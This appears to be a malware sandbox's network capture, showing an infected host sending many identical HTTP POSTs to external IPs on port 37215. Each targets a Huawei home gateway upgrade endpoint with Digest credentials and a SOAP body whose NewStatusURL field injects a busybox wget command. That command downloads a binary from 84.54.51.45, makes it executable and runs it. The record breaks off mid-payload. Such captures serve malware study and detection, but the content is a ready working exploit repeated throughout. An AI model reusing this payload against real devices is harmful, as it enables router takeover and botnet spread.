                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2237192.168.2.155097241.209.218.8537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.672785044 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2238192.168.2.156071841.192.195.14337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.672786951 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2239192.168.2.153905641.41.110.17537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.672792912 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2240192.168.2.155522441.123.53.16637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.672794104 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2241192.168.2.155547041.251.58.6437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.672794104 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2242192.168.2.155786641.84.26.19437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.672821045 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2243192.168.2.154362241.235.25.21737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.672826052 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2244192.168.2.154235841.136.130.4537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.672830105 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2245192.168.2.155729841.195.218.9937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.672868967 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2246192.168.2.154757441.12.186.5337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.672868967 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 